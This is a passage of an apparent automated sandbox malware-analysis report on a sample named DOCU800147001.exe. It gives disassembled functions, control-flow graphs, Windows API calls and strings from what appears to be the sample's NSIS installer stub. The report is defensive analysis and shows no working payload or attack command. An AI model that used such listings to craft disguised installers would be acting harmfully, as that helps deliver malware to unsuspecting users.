                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$error
                                                • API String ID: 900638850-1427305468
                                                • Opcode ID: b229ee72392ebe0fa70d66530f617bc2e1be5641544371ebedc29a6d10bf4902
                                                • Instruction ID: 9e84d75f846cee838fb64c09e4141d624f321ac221b592bdbe658a79732caf68
                                                • Opcode Fuzzy Hash: b229ee72392ebe0fa70d66530f617bc2e1be5641544371ebedc29a6d10bf4902
                                                • Instruction Fuzzy Hash: EE61EF71A04A05AFEB106B648C88BBF3BA5EF56314F14813BE541BA2D1D33C5981DF5E
                                                Function 0040543A Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 467 40543a-405460 call 4056f8 470 405462-405474 DeleteFileA 467->470 471 405479-405480 467->471 472 405603-405607 470->472 473 405482-405484 471->473 474 405493-4054a3 call 405b7a 471->474 475 4055b1-4055b6 473->475 476 40548a-40548d 473->476 482 4054b2-4054b3 call 405651 474->482 483 4054a5-4054b0 lstrcatA 474->483 475->472 478 4055b8-4055bb 475->478 476->474 476->475 480 4055c5-4055cd call 405e7e 478->480 481 4055bd-4055c3 478->481 480->472 491 4055cf-4055e3 call 40560a call 4053f2 480->491 481->472 485 4054b8-4054bb 482->485 483->485 488 4054c6-4054cc lstrcatA 485->488 489 4054bd-4054c4 485->489 490 4054d1-4054ef lstrlenA FindFirstFileA 488->490 489->488 489->490 492 4054f5-40550c call 405635 490->492 493 4055a7-4055ab 490->493 506 4055e5-4055e8 491->506 507 4055fb-4055fe call 404e65 491->507 500 405517-40551a 492->500 501 40550e-405512 492->501 493->475 495 4055ad 493->495 495->475 504 40551c-405521 500->504 505 40552d-40553b call 405b7a 500->505 501->500 503 405514 501->503 503->500 509 405523-405525 504->509 510 405586-405598 FindNextFileA 504->510 517 405552-40555d call 4053f2 505->517 518 40553d-405545 505->518 506->481 512 4055ea-4055f9 call 404e65 call 405a2e 506->512 507->472 509->505 513 405527-40552b 509->513 510->492 515 40559e-4055a1 FindClose 510->515 512->472 513->505 513->510 515->493 527 40557e-405581 call 404e65 517->527 528 40555f-405562 517->528 518->510 522 405547-405550 call 40543a 518->522 522->510 527->510 529 405564-405574 call 404e65 call 405a2e 528->529 530 405576-40557c 528->530 529->510 530->510
                                                APIs
                                                • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76233410,00000000), ref: 00405463
                                                • lstrcatA.KERNEL32(0079F500,\*.*,0079F500,?,?,C:\Users\user\AppData\Local\Temp\,76233410,00000000), ref: 004054AB
                                                • lstrcatA.KERNEL32(?,00409014,?,0079F500,?,?,C:\Users\user\AppData\Local\Temp\,76233410,00000000), ref: 004054CC
                                                • lstrlenA.KERNEL32(?,?,00409014,?,0079F500,?,?,C:\Users\user\AppData\Local\Temp\,76233410,00000000), ref: 004054D2
                                                • FindFirstFileA.KERNEL32(0079F500,?,?,?,00409014,?,0079F500,?,?,C:\Users\user\AppData\Local\Temp\,76233410,00000000), ref: 004054E3
                                                • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405590
                                                • FindClose.KERNEL32(00000000), ref: 004055A1
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405448
                                                • \*.*, xrefs: 004054A5
                                                • "C:\Users\user\Desktop\DOCU800147001.exe", xrefs: 0040543A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: "C:\Users\user\Desktop\DOCU800147001.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                • API String ID: 2035342205-3119656824
                                                • Opcode ID: fcd028f88b56ccba8f87acc9bf914b0b727669bb7180979610c82bc5896c6120
                                                • Instruction ID: 8ee730f1ebc31b0169d0384be9803177be11285333fd16537a0ab87d7e7bd3ec
                                                • Opcode Fuzzy Hash: fcd028f88b56ccba8f87acc9bf914b0b727669bb7180979610c82bc5896c6120
                                                • Instruction Fuzzy Hash: 2D51D030900A04BADB216B65CC45BBF7A79DB82755F14817BF844B12D2D33C9A82DFAD
                                                Function 00405E7E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileA.KERNELBASE(?,0079FD48,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,0040573B,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,?,?,76233410,0040545A,?,C:\Users\user\AppData\Local\Temp\,76233410), ref: 00405E89
                                                • FindClose.KERNEL32(00000000), ref: 00405E95
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\nsx7F0.tmp, xrefs: 00405E7E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsx7F0.tmp
                                                • API String ID: 2295610775-2526228488
                                                • Opcode ID: 3763a39385d799a14c195428d029b32a8ec39fb0b73e790bf0c2a45bf7f4e082
                                                • Instruction ID: fa6d82a82db092ae67cc5cf3184883c37463242b015de973cf80f9822f081d1d
                                                • Opcode Fuzzy Hash: 3763a39385d799a14c195428d029b32a8ec39fb0b73e790bf0c2a45bf7f4e082
                                                • Instruction Fuzzy Hash: D7D012319095205BC7015738AC0C84B7A58DF553717104A32F4A9F52E0C3789D629AE9
                                                Function 00405EA5 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,?,?,00403110,00000008), ref: 00405EB7
                                                • LoadLibraryA.KERNELBASE(?,?,?,00403110,00000008), ref: 00405EC2
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00405ED3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                • String ID:
                                                • API String ID: 310444273-0
                                                • Opcode ID: 6a16e0dd3cc6108475a6e7adf37e54332756fcc3f7317002038e5d5bd84af621
                                                • Instruction ID: 6203a20b8c6d2c7dd9bc8fde92c4464bacb2d6670710d6b04c7398c309678aab
                                                • Opcode Fuzzy Hash: 6a16e0dd3cc6108475a6e7adf37e54332756fcc3f7317002038e5d5bd84af621
                                                • Instruction Fuzzy Hash: 25E0C232A04611ABC710AB34DC08A6B77B8EF88651304893EF555F6151D734EC11ABFA
                                                Function 00403995 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 113 403995-4039a7 114 403ae8-403af7 113->114 115 4039ad-4039b3 113->115 116 403b46-403b5b 114->116 117 403af9-403b41 GetDlgItem * 2 call 403e68 SetClassLongA call 40140b 114->117 115->114 118 4039b9-4039c2 115->118 122 403b9b-403ba0 call 403eb4 116->122 123 403b5d-403b60 116->123 117->116 119 4039c4-4039d1 SetWindowPos 118->119 120 4039d7-4039da 118->120 119->120 124 4039f4-4039fa 120->124 125 4039dc-4039ee ShowWindow 120->125 135 403ba5-403bc0 122->135 127 403b62-403b6d call 401389 123->127 128 403b93-403b95 123->128 130 403a16-403a19 124->130 131 4039fc-403a11 DestroyWindow 124->131 125->124 127->128 150 403b6f-403b8e SendMessageA 127->150 128->122 134 403e35 128->134 141 403a1b-403a27 SetWindowLongA 130->141 142 403a2c-403a32 130->142 139 403e12-403e18 131->139 138 403e37-403e3e 134->138 136 403bc2-403bc4 call 40140b 135->136 137 403bc9-403bcf 135->137 136->137 146 403df3-403e0c DestroyWindow EndDialog 137->146 147 403bd5-403be0 137->147 139->134 144 403e1a-403e20 139->144 141->138 148 403ad5-403ae3 call 403ecf 142->148 149 403a38-403a49 GetDlgItem 142->149 144->134 151 403e22-403e2b ShowWindow 144->151 146->139 147->146 152 403be6-403c33 call 405b9c call 403e68 * 3 GetDlgItem 147->152 148->138 153 403a68-403a6b 149->153 154 403a4b-403a62 SendMessageA IsWindowEnabled 149->154 150->138 151->134 183 403c35-403c3a 152->183 184 403c3d-403c79 ShowWindow KiUserCallbackDispatcher call 403e8a EnableWindow 152->184 157 403a70-403a73 153->157 158 403a6d-403a6e 153->158 154->134 154->153 162 403a81-403a86 157->162 163 403a75-403a7b 157->163 161 403a9e-403aa3 call 403e41 158->161 161->148 164 403a88-403a8e 162->164 165 403abc-403acf SendMessageA 162->165 163->165 168 403a7d-403a7f 163->168 169 403a90-403a96 call 40140b 164->169 170 403aa5-403aae call 40140b 164->170 165->148 168->161 179 403a9c 169->179 170->148 180 403ab0-403aba 170->180 179->161 180->179 183->184 187 403c7b-403c7c 184->187 188 403c7e 184->188 189 403c80-403cae GetSystemMenu EnableMenuItem SendMessageA 187->189 188->189 190 403cb0-403cc1 SendMessageA 189->190 191 403cc3 189->191 192 403cc9-403d02 call 403e9d call 405b7a lstrlenA call 405b9c SetWindowTextA call 401389 190->192 191->192 192->135 201 403d08-403d0a 192->201 201->135 202 403d10-403d14 201->202 203 403d33-403d47 DestroyWindow 202->203 204 403d16-403d1c 202->204 203->139 206 403d4d-403d7a CreateDialogParamA 203->206 204->134 205 403d22-403d28 204->205 205->135 207 403d2e 205->207 206->139 208 403d80-403dd7 call 403e68 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 206->208 207->134 208->134 213 403dd9-403dec ShowWindow call 403eb4 208->213 215 403df1 213->215 215->139
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039D1
                                                • ShowWindow.USER32(?), ref: 004039EE
                                                • DestroyWindow.USER32 ref: 00403A02
                                                • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A1E
                                                • GetDlgItem.USER32(?,?), ref: 00403A3F
                                                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A53
                                                • IsWindowEnabled.USER32(00000000), ref: 00403A5A
                                                • GetDlgItem.USER32(?,00000001), ref: 00403B08
                                                • GetDlgItem.USER32(?,00000002), ref: 00403B12
                                                • SetClassLongA.USER32(?,000000F2,?), ref: 00403B2C
                                                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B7D
                                                • GetDlgItem.USER32(?,00000003), ref: 00403C23
                                                • ShowWindow.USER32(00000000,?), ref: 00403C44
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403C56
                                                • EnableWindow.USER32(?,?), ref: 00403C71
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C87
                                                • EnableMenuItem.USER32(00000000), ref: 00403C8E
                                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CA6
                                                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CB9
                                                • lstrlenA.KERNEL32(0079E4F8,?,0079E4F8,Pantaloons Setup), ref: 00403CE2
                                                • SetWindowTextA.USER32(?,0079E4F8), ref: 00403CF1
                                                • ShowWindow.USER32(?,0000000A), ref: 00403E25
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                • String ID: Pantaloons Setup
                                                • API String ID: 3282139019-2509248433
                                                • Opcode ID: dc92851be55ad4f4c841ea62a58ff80a22c35efc62c6a4be6cbd4543e075fcc2
                                                • Instruction ID: 9d8e585b2be547e11c17cdc3c7f689375e8eb6d0c46788926a5446a1ddc0af4a
                                                • Opcode Fuzzy Hash: dc92851be55ad4f4c841ea62a58ff80a22c35efc62c6a4be6cbd4543e075fcc2
                                                • Instruction Fuzzy Hash: E4C1AF71904200ABEB216F61ED49E2B3EBCEB46746F04453EF641B11F1C73DA9429B6E
                                                Function 00403603 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216stringregistrylibraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 267 403603-40361b call 405ea5 270 40361d-40362d call 405ad8 267->270 271 40362f-403660 call 405a61 267->271 280 403683-4036ac call 4038c8 call 4056f8 270->280 276 403662-403673 call 405a61 271->276 277 403678-40367e lstrcatA 271->277 276->277 277->280 285 4036b2-4036b7 280->285 286 403733-40373b call 4056f8 280->286 285->286 287 4036b9-4036dd call 405a61 285->287 292 403749-40376e LoadImageA 286->292 293 40373d-403744 call 405b9c 286->293 287->286 294 4036df-4036e1 287->294 296 403770-4037a0 RegisterClassA 292->296 297 4037ef-4037f7 call 40140b 292->297 293->292 298 4036f2-4036fe lstrlenA 294->298 299 4036e3-4036f0 call 405635 294->299 300 4037a6-4037ea SystemParametersInfoA CreateWindowExA 296->300 301 4038be 296->301 308 403801-40380c call 4038c8 297->308 309 4037f9-4037fc 297->309 306 403700-40370e lstrcmpiA 298->306 307 403726-40372e call 40560a call 405b7a 298->307 299->298 300->297 304 4038c0-4038c7 301->304 306->307 312 403710-40371a GetFileAttributesA 306->312 307->286 320 403812-40382f ShowWindow LoadLibraryA 308->320 321 403895-403896 call 404f37 308->321 309->304 315 403720-403721 call 405651 312->315 316 40371c-40371e 312->316 315->307 316->307 316->315 322 403831-403836 LoadLibraryA 320->322 323 403838-40384a GetClassInfoA 320->323 325 40389b-40389d 321->325 322->323 326 403862-403885 DialogBoxParamA call 40140b 323->326 327 40384c-40385c GetClassInfoA RegisterClassA 323->327 328 4038b7-4038b9 call 40140b 325->328 329 40389f-4038a5 325->329 333 40388a-403893 call 403553 326->333 327->326 328->301 329->309 331 4038ab-4038b2 call 40140b 329->331 331->309 333->304
                                                APIs
                                                  • Part of subcall function 00405EA5: GetModuleHandleA.KERNEL32(?,?,?,00403110,00000008), ref: 00405EB7
                                                  • Part of subcall function 00405EA5: LoadLibraryA.KERNELBASE(?,?,?,00403110,00000008), ref: 00405EC2
                                                  • Part of subcall function 00405EA5: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED3
                                                • lstrcatA.KERNEL32(1033,0079E4F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E4F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\,76233410,"C:\Users\user\Desktop\DOCU800147001.exe",00000000), ref: 0040367E
                                                • lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne,1033,0079E4F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E4F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004036F3
                                                • lstrcmpiA.KERNEL32(?,.exe), ref: 00403706
                                                • GetFileAttributesA.KERNEL32(: Completed), ref: 00403711
                                                • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne), ref: 0040375A
                                                  • Part of subcall function 00405AD8: wsprintfA.USER32 ref: 00405AE5
                                                • RegisterClassA.USER32(007A16A0), ref: 00403797
                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004037AF
                                                • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004037E4
                                                • ShowWindow.USER32(00000005,00000000), ref: 0040381A
                                                • LoadLibraryA.KERNELBASE(RichEd20), ref: 0040382B
                                                • LoadLibraryA.KERNEL32(RichEd32), ref: 00403836
                                                • GetClassInfoA.USER32(00000000,RichEdit20A,007A16A0), ref: 00403846
                                                • GetClassInfoA.USER32(00000000,RichEdit,007A16A0), ref: 00403853
                                                • RegisterClassA.USER32(007A16A0), ref: 0040385C
                                                • DialogBoxParamA.USER32(?,00000000,00403995,00000000), ref: 0040387B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: "C:\Users\user\Desktop\DOCU800147001.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                • API String ID: 914957316-2590107342
                                                • Opcode ID: 793c3615d725b4b40fa8a9d39dcb85edc3cd67279c4ac99e8dddf97008cf1633
                                                • Instruction ID: 4586539b311a540a7331b1428def64a498e1fe17218f43e7d0271d3a33dfe7cf
                                                • Opcode Fuzzy Hash: 793c3615d725b4b40fa8a9d39dcb85edc3cd67279c4ac99e8dddf97008cf1633
                                                • Instruction Fuzzy Hash: 6561F5B49442407EE320AF619C85F2B3EACE786746F44857EF545B22E1CB7D69018A2E
                                                Function 00402C2B Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 338 402c2b-402c79 GetTickCount GetModuleFileNameA call 40580b 341 402c85-402cb3 call 405b7a call 405651 call 405b7a GetFileSize 338->341 342 402c7b-402c80 338->342 350 402da0-402dae call 402bc7 341->350 351 402cb9 341->351 343 402e5d-402e61 342->343 358 402db0-402db3 350->358 359 402e03-402e08 350->359 353 402cbe-402cd5 351->353 355 402cd7 353->355 356 402cd9-402ce2 call 40306a 353->356 355->356 363 402ce8-402cef 356->363 364 402e0a-402e12 call 402bc7 356->364 361 402db5-402dcd call 403080 call 40306a 358->361 362 402dd7-402e01 GlobalAlloc call 403080 call 402e64 358->362 359->343 361->359 384 402dcf-402dd5 361->384 362->359 389 402e14-402e25 362->389 368 402cf1-402d05 call 4057c6 363->368 369 402d6b-402d6f 363->369 364->359 374 402d79-402d7f 368->374 387 402d07-402d0e 368->387 373 402d71-402d78 call 402bc7 369->373 369->374 373->374 380 402d81-402d8b call 405f17 374->380 381 402d8e-402d98 374->381 380->381 381->353 388 402d9e 381->388 384->359 384->362 387->374 391 402d10-402d17 387->391 388->350 392 402e27 389->392 393 402e2d-402e32 389->393 391->374 395 402d19-402d20 391->395 392->393 394 402e33-402e39 393->394 394->394 396 402e3b-402e56 SetFilePointer call 4057c6 394->396 395->374 397 402d22-402d29 395->397 400 402e5b 396->400 397->374 399 402d2b-402d4b 397->399 399->359 401 402d51-402d55 399->401 400->343 402 402d57-402d5b 401->402 403 402d5d-402d65 401->403 402->388 402->403 403->374 404 402d67-402d69 403->404 404->374
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00402C3C
                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\DOCU800147001.exe,00000400), ref: 00402C58
                                                  • Part of subcall function 0040580B: GetFileAttributesA.KERNELBASE(00000003,00402C6B,C:\Users\user\Desktop\DOCU800147001.exe,80000000,00000003), ref: 0040580F
                                                  • Part of subcall function 0040580B: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405831
                                                • GetFileSize.KERNEL32(00000000,00000000,007A9000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DOCU800147001.exe,C:\Users\user\Desktop\DOCU800147001.exe,80000000,00000003), ref: 00402CA4
                                                Strings
                                                • soft, xrefs: 00402D19
                                                • C:\Users\user\Desktop\DOCU800147001.exe, xrefs: 00402C42, 00402C51, 00402C65, 00402C85
                                                • C:\Users\user\Desktop, xrefs: 00402C86, 00402C8B, 00402C91
                                                • Inst, xrefs: 00402D10
                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E03
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C35
                                                • "C:\Users\user\Desktop\DOCU800147001.exe", xrefs: 00402C2B
                                                • Null, xrefs: 00402D22
                                                • Error launching installer, xrefs: 00402C7B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
